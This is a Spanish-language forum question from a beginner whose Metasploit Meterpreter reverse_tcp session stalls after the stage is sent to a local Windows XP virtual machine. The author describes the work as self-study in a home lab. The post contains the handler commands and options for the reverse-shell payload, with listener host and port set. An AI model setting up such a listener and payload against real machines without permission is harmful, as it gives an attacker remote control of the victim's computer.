Buen día estimados.
Estoy intentando obtener la meterpreter a través de reverse_tcp en Windows desde Linux con el metasploit.
El problema es que una shell consigo obtener perfectamente. Cuando la máquina víctima ejecuta el .exe que generé anteriormente, no hay problema; si intento obtener una sesión meterpreter, la salida en el metasploit es la siguiente:
Estoy intentando obtener la meterpreter a través de reverse_tcp en Windows desde Linux con el metasploit.
El problema es que una shell consigo obtener perfectamente. Cuando la máquina víctima ejecuta el .exe que generé anteriormente, no hay problema; si intento obtener una sesión meterpreter, la salida en el metasploit es la siguiente:
CitarEl problema es que se queda en
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
- Started reverse handler on 192.168.1.102:4444
- Starting the payload handler...
- Sending stage (752128 bytes) to 192.168.1.110
- Sending stage (752128 bytes) to 192.168.1.110[/b]
y luego no pasa nada.
Soy principiante, recién ayer me puse a ver todo ésto del Metasploit y la verdad me interesa muchísimo; mis intenciones no son malas en ningún lugar, por eso hago pruebas locales, simplemente para aprender a proteger mi propio equipo por empezar.
La máquina víctima es una máquina virtual con Windows XP SP3 "pelado" (entendiéndose el término "pelado" como a un windows recién instalado, y sin ningun soft extra)
Saludos y gracias.